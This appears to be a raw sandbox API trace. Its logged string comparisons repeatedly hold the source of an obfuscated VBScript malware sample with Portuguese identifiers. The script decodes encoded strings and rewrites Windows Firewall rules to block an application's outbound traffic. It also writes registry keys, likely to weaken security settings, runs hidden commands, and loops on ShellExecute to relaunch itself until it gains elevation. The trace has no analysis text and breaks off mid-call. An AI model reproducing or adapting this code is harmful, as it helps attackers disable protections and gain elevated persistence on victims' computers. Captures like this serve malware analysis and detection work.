bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.296] wcsncmp (_String1="= asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0226.296] wcsncmp (_String1=" asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.296] wcsncmp (_String1="asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0226.296] wcsncmp (_String1="sc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, 